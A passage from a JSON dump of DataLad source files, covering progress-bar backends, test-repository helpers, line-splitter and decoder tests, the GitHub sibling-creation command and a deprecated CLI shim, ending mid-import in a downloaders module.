'%s%s' % (self._naturalfloat(x), self.unit or '')\n\n @staticmethod\n def _naturaldelta(x):\n # humanize is too human for little things\n return humanize.naturaldelta(x) \\\n if x > 2 \\\n else LogProgressBar._naturalfloat(x) + ' sec'\n\n def start(self, initial=0):\n super().start(initial=initial)\n msg = \" with initial specified to be {initial}\" if initial else ''\n lgr.info(\"Start %s%s\", self.label, msg)\n\n def finish(self, partial=False):\n msg, args = ' %s ', [self.label]\n\n if partial:\n # that is the best we know so far:\n amount = self.current\n if self.total is not None:\n if amount != self.total:\n perc_done = 100. * amount / self.total\n if perc_done <= 100:\n msg += \"partially (%.2f%% of %s) \"\n args += [\n perc_done,\n self._naturalsize(self.total)\n ]\n else:\n # well well -- we still probably have some issue with\n # over-reporting when getting data from datalad-archives\n # Instead of providing non-sense % here, just report\n # our best guess\n msg += \"possibly partially \"\n else:\n # well -- that means that we did manage to get all of it\n pass\n else:\n msg += \"possibly partially \"\n msg += \"done\"\n else:\n # Are we \"finish\"ed because interrupted or done?\n amount = self.total\n if amount:\n msg += '%s done'\n args += [self._naturalsize(amount)]\n else:\n msg += \"done\"\n\n dt = float(time.time() - self._start_time)\n\n if dt:\n msg += ' in %s'\n args += [self._naturaldelta(dt)]\n\n if amount:\n speed = amount / dt\n msg += ' at %s/sec'\n args += [self._naturalsize(speed)]\n\n lgr.info(msg, *args)\n\n\nprogressbars = {\n # let for compatibility, use \"none\" instead\n 'silent': SilentProgressBar,\n 'none': SilentProgressBar,\n 'log': LogProgressBar,\n}\n\n\ntry:\n from tqdm import tqdm\n from datalad.utils import updated\n\n class tqdmProgressBar(ProgressBarBase):\n \"\"\"Adapter for tqdm.ProgressBar\"\"\"\n\n backend = 'tqdm'\n _frontends = {\n None: tqdm,\n 'ipython': None # to be loaded\n }\n\n _default_pbar_params = {\n 'mininterval': 0.1,\n 'dynamic_ncols': True, # react to changes in the terminal width\n }\n\n def __init__(self, label='', fill_text=None,\n total=None, unit='B', out=sys.stdout, leave=False,\n frontend=None):\n \"\"\"\n\n Parameters\n ----------\n label\n fill_text\n total\n unit\n out\n leave\n frontend: (None, 'ipython'), optional\n tqdm module to use. Could be tqdm_notebook if under IPython\n \"\"\"\n super(tqdmProgressBar, self).__init__(label=label,\n total=total,\n unit=unit)\n\n if frontend not in self._frontends:\n raise ValueError(\n \"Know only about following tqdm frontends: %s. Got %s\"\n % (', '.join(map(str, self._frontends)),\n frontend))\n\n tqdm_frontend = self._frontends[frontend]\n if not tqdm_frontend:\n if frontend == 'ipython':\n from tqdm import tqdm_notebook\n tqdm_frontend = self._frontends[frontend] = tqdm_notebook\n else:\n lgr.error(\n \"Something went wrong here, using default tqdm frontend for %s\",\n frontend)\n tqdm_frontend = self._frontends[frontend] = self._frontends[None]\n\n self._tqdm = tqdm_frontend\n self._pbar_params = updated(\n self._default_pbar_params,\n dict(desc=label, unit=unit,\n unit_scale=True, total=total, file=out,\n leave=leave,\n ))\n if label and 'total' in label.lower() and 'smoothing' not in self._pbar_params:\n # ad-hoc: All tqdm totals will report total mean, and not some\n # momentary speed\n self._pbar_params['smoothing'] = 0\n self._pbar = None\n\n def _create(self, initial=0):\n if self._pbar is None:\n self._pbar = self._tqdm(initial=initial, **self._pbar_params)\n\n def update(self, size, increment=False, total=None):\n self._create()\n if total is not None:\n # only a reset can change the total of an existing pbar\n self._pbar.reset(total)\n # we need to (re-)advance the pbar back to the old state\n self._pbar.update(self.current)\n # an update() does not (reliably) trigger a refresh, hence\n # without the next, the pbar may still show zero progress\n if not size:\n # whenever a total is changed, we need a refresh. If there is\n # no progress update, we do it here, else we'll do it after\n # the progress update\n self._pbar.refresh()\n # if we set a new total and also advance the progress bar:\n if not size:\n return\n inc = size - self.current\n try:\n self._pbar.update(size if increment else inc)\n if total:\n # refresh to new total and progress\n self._pbar.refresh()\n except ValueError:\n # Do not crash entire process because of some glitch with\n # progressbar update\n # TODO: issue a warning?\n pass\n super(tqdmProgressBar, self).update(size,\n increment=increment,\n total=total)\n\n def start(self, initial=0):\n super(tqdmProgressBar, self).start(initial=initial)\n self._create(initial=initial)\n\n def refresh(self):\n super(tqdmProgressBar, self).refresh()\n # older tqdms might not have refresh yet but I think we can live\n # without it for a bit there\n if hasattr(self._tqdm, 'refresh'):\n self._pbar.refresh()\n\n def finish(self, clear=False, partial=False):\n \"\"\"\n\n Parameters\n ----------\n clear : bool, optional\n Explicitly clear the progress bar. Note that we are\n creating them with leave=False so they should disappear on their\n own and explicit clear call should not be necessary\n\n Returns\n -------\n\n \"\"\"\n if clear:\n self.clear()\n # be tolerant to bugs in those\n try:\n if self._pbar is not None:\n self._pbar.close()\n finally:\n self._pbar = None\n try:\n super(tqdmProgressBar, self).finish()\n except Exception as exc: # pragma: no cover\n #lgr.debug(\"Finishing tqdmProgresBar thrown %s\", str_exc(exc))\n pass\n\n def clear(self):\n try:\n self._pbar.clear()\n except:\n # if has none -- we can't do anything about it for now ;)\n # 4.7.4 seems to have it\n pass\n\n def set_desc(self, value):\n self._pbar.desc = value\n\n\n progressbars['tqdm'] = tqdmProgressBar\nexcept ImportError: # pragma: no cover\n pass\n\nassert len(progressbars), \"We need tqdm library to report progress\"\n\n\nclass AnnexSpecialRemoteProgressBar(ProgressBarBase):\n \"\"\"Hook up to the special remote and report progress back to annex\"\"\"\n\n def __init__(self, *args, **kwargs):\n # not worth passing anything since we don't care about anything\n remote = kwargs.get('remote')\n super(AnnexSpecialRemoteProgressBar, self).__init__()\n self.remote = remote\n\n def update(self, *args, **kwargs):\n super(AnnexSpecialRemoteProgressBar, self).update(*args, **kwargs)\n # now use stored value\n if self.remote:\n self.remote.send_progress(self.current)\n\nprogressbars['annex-remote'] = AnnexSpecialRemoteProgressBar\n" }, { "alpha_fraction": 0.5619664192199707, "alphanum_fraction": 0.5655466914176941, "avg_line_length": 33.25471878051758, "blob_id": "7a26d92dc01c2e9bdd060019ec1f61c158136297", "content_id": "b0e201eb7176847517b90fcdde4399f81b1229cb", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7262, "license_type": "permissive", "max_line_length": 96, "num_lines": 212, "path": "/datalad/tests/utils_testrepos.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport os\nimport tempfile\nfrom abc import (\n ABCMeta,\n abstractmethod,\n)\nfrom os.path import (\n exists,\n)\nfrom os.path import join as opj\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.customremotes.base import init_datalad_remote\n\nfrom .. import __version__\nfrom ..support.annexrepo import AnnexRepo\nfrom ..support.external_versions import external_versions\nfrom ..support.gitrepo import GitRepo\nfrom ..support.network import get_local_file_url\nfrom ..utils import (\n swallow_logs,\n swallow_outputs,\n)\nfrom . import _TEMP_PATHS_GENERATED\nfrom .utils_pytest import get_tempfile_kwargs\n\n# eventually become a URL to a local file served via http\n# that can be used for http/url-based testing\nremote_file_url = None\n\n\nclass TestRepo(object, metaclass=ABCMeta):\n\n REPO_CLASS = None # Assign to the class to be used in the subclass\n\n def __init__(self, path=None, puke_if_exists=True):\n if not path:\n path = \\\n tempfile.mktemp(**get_tempfile_kwargs(\n {'dir': dl_cfg.get(\"datalad.tests.temp.dir\")},\n prefix='testrepo'))\n # to be removed upon teardown\n _TEMP_PATHS_GENERATED.append(path)\n if puke_if_exists and exists(path):\n raise RuntimeError(\"Directory %s for test repo already exist\" % path)\n # swallow logs so we don't print all those about crippled FS etc\n with swallow_logs():\n self.repo = self.REPO_CLASS(path)\n # For additional testing of our datalad remote to not interfere\n # and manage to handle all http urls and requests:\n if self.REPO_CLASS is AnnexRepo and \\\n os.environ.get('DATALAD_TESTS_DATALADREMOTE'):\n init_datalad_remote(self.repo, 'datalad', autoenable=True)\n\n self._created = False\n\n @property\n def path(self):\n return self.repo.path\n\n @property\n def url(self):\n return get_local_file_url(self.path, compatibility='git')\n\n def create_file(self, name, content, add=True, annex=False):\n filename = opj(self.path, name)\n with open(filename, 'wb') as f:\n f.write(content.encode())\n if add:\n if annex:\n if isinstance(self.repo, AnnexRepo):\n self.repo.add(name)\n else:\n raise ValueError(\"Can't annex add to a non-annex repo.\")\n else:\n self.repo.add(name, git=True)\n\n def create(self):\n if self._created:\n assert(exists(self.path))\n return # was already done\n with swallow_outputs(): # we don't need those outputs at this point\n self.populate()\n self._created = True\n\n @abstractmethod\n def populate(self):\n raise NotImplementedError(\"Should be implemented in sub-classes\")\n\n\nclass BasicAnnexTestRepo(TestRepo):\n \"\"\"Creates a basic test git-annex repository\"\"\"\n\n REPO_CLASS = AnnexRepo\n\n def populate(self):\n global remote_file_url\n if not remote_file_url:\n # we need a local file, that is server via a URL\n from datalad.conftest import test_http_server\n remote_file_name = 'testrepo-annex.dat'\n with open(opj(test_http_server.path, remote_file_name), \"w\") as f:\n f.write(\"content to be annex-addurl'd\")\n remote_file_url = '{}/{}'.format(test_http_server.url, remote_file_name)\n self.create_info_file()\n self.create_file('test.dat', '123\\n', annex=False)\n self.repo.commit(\"Adding a basic INFO file and rudimentary load file for annex testing\")\n self.repo.add_url_to_file(\"test-annex.dat\", remote_file_url)\n self.repo.commit(\"Adding a rudimentary git-annex load file\")\n self.repo.drop(\"test-annex.dat\") # since available from URL\n\n def create_info_file(self):\n annex_version = external_versions['cmd:annex']\n git_version = external_versions['cmd:git']\n self.create_file('INFO.txt',\n \"Testrepo: %s\\n\"\n \"git: %s\\n\"\n \"annex: %s\\n\"\n \"datalad: %s\\n\"\n % (self.__class__, git_version, annex_version, __version__),\n annex=False)\n\n\nclass BasicGitTestRepo(TestRepo):\n \"\"\"Creates a basic test git repository.\"\"\"\n\n REPO_CLASS = GitRepo\n\n def populate(self):\n self.create_info_file()\n self.create_file('test.dat', '123\\n', annex=False)\n self.repo.commit(\"Adding a basic INFO file and rudimentary \"\n \"load file.\")\n\n def create_info_file(self):\n git_version = external_versions['cmd:git']\n self.create_file('INFO.txt',\n \"Testrepo: %s\\n\"\n \"git: %s\\n\"\n \"datalad: %s\\n\"\n % (self.__class__, git_version, __version__),\n annex=False)\n\n\nclass SubmoduleDataset(BasicAnnexTestRepo):\n\n def populate(self):\n\n super(SubmoduleDataset, self).populate()\n # add submodules\n annex = BasicAnnexTestRepo()\n annex.create()\n kw = dict(expect_stderr=True)\n self.repo.call_git(\n ['submodule', 'add', annex.url, 'subm 1'], **kw)\n self.repo.call_git(\n ['submodule', 'add', annex.url, '2'], **kw)\n self.repo.commit('Added subm 1 and 2.')\n self.repo.call_git(\n ['submodule', 'update', '--init', '--recursive'], **kw)\n # init annex in subdatasets\n for s in ('subm 1', '2'):\n AnnexRepo(opj(self.path, s), init=True)\n\n\nclass NestedDataset(BasicAnnexTestRepo):\n\n def populate(self):\n super(NestedDataset, self).populate()\n ds = SubmoduleDataset()\n ds.create()\n kw = dict(expect_stderr=True)\n self.repo.call_git(\n ['submodule', 'add', ds.url, 'sub dataset1'], **kw)\n self.repo.call_git(\n ['-C', opj(self.path, 'sub dataset1'),\n 'submodule', 'add', ds.url, 'sub sub dataset1'],\n **kw)\n GitRepo(opj(self.path, 'sub dataset1')).commit('Added sub dataset.')\n self.repo.commit('Added subdatasets.', options=[\"-a\"])\n self.repo.call_git(\n ['submodule', 'update', '--init', '--recursive'],\n **kw)\n # init all annexes\n for s in ('', 'sub dataset1', opj('sub dataset1', 'sub sub dataset1')):\n AnnexRepo(opj(self.path, s), init=True)\n\n\nclass InnerSubmodule(object):\n\n def __init__(self):\n self._ds = NestedDataset()\n\n @property\n def path(self):\n return opj(self._ds.path, 'sub dataset1', 'subm 1')\n\n @property\n def url(self):\n return get_local_file_url(self.path, compatibility='git')\n\n def create(self):\n self._ds.create()\n" }, { "alpha_fraction": 0.5893104076385498, "alphanum_fraction": 0.5922285318374634, "avg_line_length": 31.073890686035156, "blob_id": "b9d9ea12df6b57b6e7a22705b35ef51ed7266573", "content_id": "ac1d575e0b35eec5bec340ffd37d3406f9ff48b0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6546, "license_type": "permissive", "max_line_length": 79, "num_lines": 203, "path": "/datalad/runner/tests/test_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nfrom typing import Optional\nfrom unittest.mock import (\n call,\n patch,\n)\n\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_in,\n assert_is_none,\n)\n\nfrom ..utils import (\n AssemblingDecoderMixIn,\n LineSplitter,\n)\n\ntest_lines = [\n \"first line\",\n \"second line\",\n \"third line\",\n \"\"\n]\n\n\ndef _check_splitting_endings_separator(endings: list[str],\n separator: Optional[str] = None,\n keep_ends: bool = False,\n check_continuation: bool = False\n ) -> None:\n for line_ending in endings:\n line_splitter = LineSplitter(separator=separator, keep_ends=keep_ends)\n full_end = line_ending + separator if separator else line_ending\n if separator:\n expected_end = full_end if keep_ends else line_ending\n else:\n expected_end = line_ending if keep_ends else \"\"\n\n lines = line_splitter.process(\n full_end.join(test_lines)\n + full_end\n + (\"fourth \" if check_continuation else \"\")\n )\n assert_equal(\n lines,\n [line + expected_end for line in test_lines]\n )\n\n if check_continuation:\n assert_equal(line_splitter.remaining_data, \"fourth \")\n lines = line_splitter.process(\"line\" + full_end)\n assert_equal(\n lines,\n [\"fourth line\" + expected_end])\n assert_is_none(line_splitter.finish_processing())\n else:\n assert_is_none(line_splitter.finish_processing())\n\n\ndef test_line_splitter_basic() -> None:\n # expect lines without endings, split at standard line-endings\n _check_splitting_endings_separator([\"\\n\", \"\\r\\n\"])\n _check_splitting_endings_separator([\"\\n\", \"\\r\\n\"], check_continuation=True)\n\n\ndef test_line_splitter_basic_keep() -> None:\n # expect lines without endings, split at standard line-endings\n _check_splitting_endings_separator([\"\\n\", \"\\r\\n\"], keep_ends=True)\n _check_splitting_endings_separator(\n [\"\\n\", \"\\r\\n\"],\n keep_ends=True,\n check_continuation=True)\n\n\ndef test_line_splitter_zero() -> None:\n # expect lines without endings, split at standard line-endings\n _check_splitting_endings_separator([\"\\n\", \"\\r\\n\"], separator=\"\\x00\")\n _check_splitting_endings_separator(\n [\"\\n\", \"\\r\\n\"],\n separator=\"\\x00\",\n check_continuation=True)\n\n\ndef test_line_splitter_zero_keep() -> None:\n # expect lines without endings, split at standard line-endings\n _check_splitting_endings_separator(\n [\"\\n\", \"\\r\\n\"],\n separator=\"\\x00\",\n keep_ends=True)\n _check_splitting_endings_separator(\n [\"\\n\", \"\\r\\n\"],\n separator=\"\\x00\",\n keep_ends=True,\n check_continuation=True)\n\n\ndef test_line_splitter_corner_cases() -> None:\n line_splitter = LineSplitter()\n lines = line_splitter.process(\"\")\n assert_equal(lines, [])\n assert_equal(line_splitter.remaining_data, None)\n\n line_splitter = LineSplitter()\n lines = line_splitter.process(\"\")\n assert_equal(lines, [])\n lines = line_splitter.process(\"\\n\")\n assert_equal(lines, [\"\"])\n assert_equal(line_splitter.remaining_data, None)\n\n line_splitter = LineSplitter()\n lines = line_splitter.process(\" a \\f \\r\\n\")\n assert_equal(lines, [\" a \", \" \"])\n\n\ndef test_assembling_decoder_mix_in_basic() -> None:\n\n encoding = \"utf-8\"\n unicode_str = \"These are not ASCII: ä, ö, ü. These can be ASCII: a, o, u.\"\n data_bytes = unicode_str.encode(encoding)\n\n adm = AssemblingDecoderMixIn()\n\n single_result = \"\".join([\n adm.decode(1, bytes([data_byte]), encoding)\n for data_byte in data_bytes\n ])\n assert_equal(single_result, unicode_str)\n\n\ndef _decode_multiple(adm: AssemblingDecoderMixIn,\n encoded_strings: list[bytes],\n encoding: str,\n fixed_index: Optional[int] = None) -> list[str]:\n\n # Interleave decoding of multiple strings\n decoded_chars: list[list] = [list() for _ in range(len(encoded_strings))]\n for data_index in range(max([len(es) for es in encoded_strings])):\n for string_index in range(len(encoded_strings)):\n if data_index < len(encoded_strings[string_index]):\n decoded_char = adm.decode(\n string_index if fixed_index is None else fixed_index,\n bytes([encoded_strings[string_index][data_index]]),\n encoding)\n decoded_chars[string_index].append(decoded_char)\n return [\"\".join(decoded_list) for decoded_list in decoded_chars]\n\n\ndef test_assembling_decoder_mix_in_multiple() -> None:\n encoding = \"utf-8\"\n unicode_strings = [\n \"These are not ASCII: ä, ö, ü. These can be ASCII: a, o, u.\",\n \"Some other weird stuff: öäöß.\",\n \"Even weirder: 🐷🐶.\",\n ]\n encoded_strings = [\n unicode_string.encode(encoding)\n for unicode_string in unicode_strings\n ]\n\n adm = AssemblingDecoderMixIn()\n decoded_strings = _decode_multiple(adm, encoded_strings, encoding)\n assert_equal(unicode_strings, decoded_strings)\n\n\ndef test_assembling_decoder_mix_in_multiple_fail() -> None:\n encoding = \"utf-8\"\n unicode_strings = [\n \"A: ä, ö, ü.\",\n \"B: öäöß.\",\n \"C: 🐷🐶.\",\n ]\n encoded_strings = [\n unicode_string.encode(encoding)\n for unicode_string in unicode_strings\n ]\n\n adm = AssemblingDecoderMixIn()\n decoded_strings = _decode_multiple(adm, encoded_strings, encoding, 0)\n # Because the strings are not separated, we do not expect any proper\n # output after single-byte encoded chars.\n assert_equal(decoded_strings, [\"A: \", \"B: \", \"C: \"])\n\n\ndef test_assembling_decoder_mix_in_warning() -> None:\n encoding = \"utf-8\"\n data_bytes = \"🐷🐶.\".encode(encoding)\n\n adm = AssemblingDecoderMixIn()\n\n with patch(\"datalad.runner.utils.logger\") as logger_mock:\n result = adm.decode(1, data_bytes[0:1], encoding)\n assert_equal(result, '')\n del adm\n assert_in(\n call.warning(\"unprocessed data in AssemblingDecoderMixIn\"),\n logger_mock.mock_calls)\n assert_in(\n call.debug(\n \"unprocessed data in AssemblingDecoderMixIn:\\n\"\n \"fd: 1, data: b'\\\\xf0'\\n\"),\n logger_mock.mock_calls)\n" }, { "alpha_fraction": 0.5795660018920898, "alphanum_fraction": 0.5809633135795593, "avg_line_length": 38.75817108154297, "blob_id": "50be14f75cca6ae98d837be9cd4368f72c411c42", "content_id": "c1182be1ce6aa538951d54adda08f4afc2776588", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12166, "license_type": "permissive", "max_line_length": 88, "num_lines": 306, "path": "/datalad/distributed/create_sibling_github.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for creating a publication target on GitHub\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nimport warnings\nfrom urllib.parse import urljoin\n\nimport requests\n\nfrom datalad.distributed.create_sibling_ghlike import (\n _create_sibling,\n _GitHubLike,\n)\nfrom datalad.distribution.dataset import datasetmethod\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.param import Parameter\n\nlgr = logging.getLogger('datalad.distribution.create_sibling_github')\n\n\nclass _GitHub(_GitHubLike):\n \"\"\"Customizations for the GitHub platform\"\"\"\n name = 'github'\n fullname = 'GitHub'\n response_code_unauthorized = 401\n create_org_repo_endpoint = 'orgs/{organization}/repos'\n create_user_repo_endpoint = 'user/repos'\n get_authenticated_user_endpoint = 'user'\n get_repo_info_endpoint = 'repos/{user}/{repo}'\n extra_remote_settings = {\n # first make sure that annex doesn't touch this one\n # but respect any existing config\n 'annex-ignore': 'true',\n # first push should separately push active branch first\n # to overcome github issue of choosing \"default\" branch\n # alphabetically if its name does not match the default\n # branch for the user (or organization) which now defaults\n # to \"main\"\n 'datalad-push-default-first': 'true'\n }\n\n def repo_create_response(self, r):\n \"\"\"\n At present the only difference from the GHlike implementation\n is the detection of an already existing repo in a 422 response.\n \"\"\"\n try:\n response = r.json()\n except Exception as e:\n lgr.debug('Cannot get JSON payload of %s [%s]' , r, e)\n response = {}\n lgr.debug('%s responded with %s %s', self.fullname, r, response)\n if r.status_code == requests.codes.created:\n return dict(\n status='ok',\n preexisted=False,\n # perform some normalization\n reponame=response.get('name'),\n private=response.get('private'),\n clone_url=response.get('clone_url'),\n ssh_url=response.get('ssh_url'),\n html_url=response.get('html_url'),\n # and also return in full\n host_response=response,\n )\n elif r.status_code == requests.codes.unprocessable and \\\n any('already exist' in e.get('message', '')\n for e in response.get('errors', [])):\n return dict(\n status='impossible',\n message='repository already exists',\n preexisted=True,\n )\n elif r.status_code == self.response_code_unauthorized:\n return dict(\n status='error',\n message=('unauthorized: %s', response.get('message')),\n )\n # make sure any error-like situation causes noise\n r.raise_for_status()\n # catch-all\n raise RuntimeError(f'Unexpected host response: {response}')\n\n def repo_delete_request(self, orguser, reponame):\n r = requests.delete(\n urljoin(\n self.api_url,\n self.get_repo_info_endpoint.format(\n user=orguser,\n repo=reponame)),\n headers=self.request_headers,\n )\n # make sure any error-like situation causes noise\n r.raise_for_status()\n\n\n@build_doc\nclass CreateSiblingGithub(Interface):\n \"\"\"Create dataset sibling on GitHub.org (or an enterprise deployment).\n\n GitHub is a popular commercial solution for code hosting and collaborative\n development. GitHub cannot host dataset content (but see LFS,\n http://handbook.datalad.org/r.html?LFS). However, in combination with other\n data sources and siblings, publishing a dataset to GitHub can facilitate\n distribution and exchange, while still allowing any dataset consumer to\n obtain actual data content from alternative sources.\n\n In order to be able to use this command, a personal access token has to be\n generated on the platform (Account->Settings->Developer Settings->Personal\n access tokens->Generate new token).\n\n This command can be configured with\n \"datalad.create-sibling-ghlike.extra-remote-settings.NETLOC.KEY=VALUE\" in\n order to add any local KEY = VALUE configuration to the created sibling in\n the local `.git/config` file. NETLOC is the domain of the Github instance to\n apply the configuration for.\n This leads to a behavior that is equivalent to calling datalad's\n ``siblings('configure', ...)``||``siblings configure`` command with the\n respective KEY-VALUE pair after creating the sibling.\n The configuration, like any other, could be set at user- or system level, so\n users do not need to add this configuration to every sibling created with\n the service at NETLOC themselves.\n\n .. versionchanged:: 0.16\n || REFLOW >>\n The API has been aligned with the some\n ``create_sibling_...||create-sibling-...`` commands of other GitHub-like\n services, such as GOGS, GIN, GitTea.<< REFLOW ||\n\n .. deprecated:: 0.16\n The ``dryrun||--dryrun`` option will be removed in a future release, use\n the renamed ``dry_run||--dry-run`` option instead.\n The ``github_login||--github-login`` option will be removed in a future\n release, use the ``credential||--credential`` option instead.\n The ``github_organization||--github-organization`` option will be\n removed in a future release, prefix the reposity name with ``<org>/``\n instead.\n \"\"\"\n\n _examples_ = [\n dict(text=\"Use a new sibling on GIN as a common data source that is \"\n \"auto-available when cloning from GitHub\",\n code_py=\"\"\"\\\n > ds = Dataset('.')\n\n # the sibling on GIN will host data content\n > ds.create_sibling_gin('myrepo', name='gin')\n\n # the sibling on GitHub will be used for collaborative work\n > ds.create_sibling_github('myrepo', name='github')\n\n # register the storage of the public GIN repo as a data source\n > ds.siblings('configure', name='gin', as_common_datasrc='gin-storage')\n\n # announce its availability on github\n > ds.push(to='github')\n \"\"\",\n code_cmd=\"\"\"\\\n % datalad create-sibling-gin myrepo -s gin\n\n # the sibling on GitHub will be used for collaborative work\n % datalad create-sibling-github myrepo -s github\n\n # register the storage of the public GIN repo as a data source\n % datalad siblings configure -s gin --as-common-datasrc gin-storage\n\n # announce its availability on github\n % datalad push --to github\n \"\"\",\n ),\n ]\n\n _params_ = _GitHub.create_sibling_params\n _params_['api']._doc = \"\"\"\\\n URL of the GitHub instance API\"\"\"\n # special casing for deprecated mode\n _params_['existing'].constraints = EnsureChoice(\n 'skip', 'error', 'reconfigure', 'replace')\n _params_['existing']._doc += \"\"\"\\\n DEPRECATED DANGER ZONE: With 'replace', an existing repository will be\n irreversibly removed, re-initialized, and the sibling\n (re-)configured (thus implies 'reconfigure').\n `replace` could lead to data loss! In interactive sessions a\n confirmation prompt is shown, an exception is raised in non-interactive\n sessions. The 'replace' mode will be removed in a future release.\"\"\"\n # deprecated options\n _params_.update(\n github_login=Parameter(\n args=('--github-login',),\n constraints=EnsureStr() | EnsureNone(),\n metavar='TOKEN',\n doc=\"\"\"Deprecated, use the credential parameter instead.\n If given must be a personal access token.\"\"\"),\n github_organization=Parameter(\n args=('--github-organization',),\n constraints=EnsureStr() | EnsureNone(),\n metavar='NAME',\n doc=\"\"\"Deprecated, prepend a repo name with an '<orgname>/'\n prefix instead.\"\"\"),\n dryrun=Parameter(\n args=(\"--dryrun\",),\n action=\"store_true\",\n doc=\"\"\"Deprecated. Use the renamed ``dry_run||--dry-run``\n parameter\"\"\"),\n )\n\n @staticmethod\n @datasetmethod(name='create_sibling_github')\n @eval_results\n def __call__(\n reponame,\n *,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n name='github',\n existing='error',\n github_login=None,\n credential=None,\n github_organization=None,\n access_protocol='https',\n publish_depends=None,\n private=False,\n description=None,\n dryrun=False,\n dry_run=False,\n api='https://api.github.com'):\n if dryrun and not dry_run:\n # the old one is used, and not in agreement with the new one\n warnings.warn(\n \"datalad-create-sibling-github's `dryrun` option is \"\n \"deprecated and will be removed in a future release, \"\n \"use the renamed `dry_run/--dry-run` option instead.\",\n DeprecationWarning)\n dry_run = dryrun\n\n if api == 'https://api.github.com':\n token_info = \\\n 'Visit https://github.com/settings/tokens to create a token.'\n else:\n token_info = 'Log into the platform, and visit [Account->' \\\n 'Settings->Developer Settings->' \\\n 'Personal access tokens->Generate new token] ' \\\n 'to create a new token.'\n if github_login:\n warnings.warn(\n \"datalad-create-sibling-github's `github_login` option is \"\n \"deprecated and will be removed in a future release, \"\n \"use the `credential` option instead.\",\n DeprecationWarning)\n from unittest.mock import patch\n\n # shoehorn the token into an env var to read it out using the\n # normal procedures internally\n with patch.dict(\n 'os.environ',\n {'DATALAD_CREDENTIAL_GITHUBLOGINARG_TOKEN': github_login}):\n platform = _GitHub(\n api, 'githubloginarg', require_token=not dry_run,\n token_info=token_info)\n else:\n platform = _GitHub(api, credential, require_token=not dry_run,\n token_info=token_info)\n\n if github_organization:\n warnings.warn(\n \"datalad-create-sibling-github's `github_organization` \"\n \"option is deprecated and will be removed in a future \"\n \"release, prefix the reposity name with `<org>/` instead.\",\n DeprecationWarning)\n reponame = f'{github_organization}/{reponame}'\n\n yield from _create_sibling(\n platform=platform,\n reponame=reponame,\n dataset=dataset,\n recursive=recursive,\n recursion_limit=recursion_limit,\n name=name,\n existing=existing,\n access_protocol=access_protocol,\n publish_depends=publish_depends,\n private=private,\n description=description,\n dry_run=dry_run,\n )\n" }, { "alpha_fraction": 0.5360962748527527, "alphanum_fraction": 0.5508021116256714, "avg_line_length": 36.400001525878906, "blob_id": "f7834885d88fc3b720d966fb82c4b9954f02aac1", "content_id": "0389e5b71eaa7035627fb0f7af926daa908de85e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 748, "license_type": "permissive", "max_line_length": 87, "num_lines": 20, "path": "/datalad/cmdline/main.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n.. deprecated:: 0.16\n datalad.cmdline.main was replaced by datalad.cli.main\n\"\"\"\n\nimport warnings\nwarnings.warn(\"datalad.cmdline.main was replaced by datalad.cli.main in \"\n \"datalad 0.16. Please update and reinstall extensions.\",\n DeprecationWarning)\n\nfrom datalad.cli.main import main\nfrom datalad.cli.parser import setup_parser\n" }, { "alpha_fraction": 0.5630257725715637, "alphanum_fraction": 0.5647014379501343, "avg_line_length": 38.30376434326172, "blob_id": "a5a8370da909e8eb6f86a848b7417bd39994a799", "content_id": "04a8b03a3ebb85956811f020f76626d29164e5e0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 29242, "license_type": "permissive", "max_line_length": 119, "num_lines": 744, "path": "/datalad/downloaders/base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Provide access to stuff (html, data files) via HTTP and HTTPS\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport msgpack\nimport os\nimport sys\nimport time\n\nfrom abc import ABCMeta, abstractmethod\nimport os.path as op\nfrom os.path import exists, join as opj, isdir\n\n\nfrom .. import cfg\nfrom ..ui import ui\nfrom ..utils import (\n 